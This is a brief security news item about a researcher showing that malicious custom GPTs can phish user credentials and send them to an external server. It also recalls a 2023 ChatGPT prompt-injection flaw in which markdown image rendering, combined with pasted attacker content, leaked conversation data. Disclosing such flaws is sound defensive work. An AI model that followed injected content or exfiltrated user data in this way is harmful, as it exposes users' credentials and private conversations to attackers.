Malicious GPT Can Phish Credentials and Exfiltrate Them to an External Server

GPT

A researcher demonstrated how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server.

In the spring of 2023, researchers Johann Rehberger and Roman Samoilenko separately found that ChatGPT was susceptible to a prompt injection attack in which the chatbot rendered markdown images.

They gave an example of how an attacker could use image markdown rendering to trick a victim into pasting seemingly benign but malicious content from the attacker’s website in order to steal potentially sensitive information from a user’s ChatGPT conversation.

Read More: Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

For more such updates follow us on Google News ITsecuritywire News. Please subscribe to our Newsletter for more updates.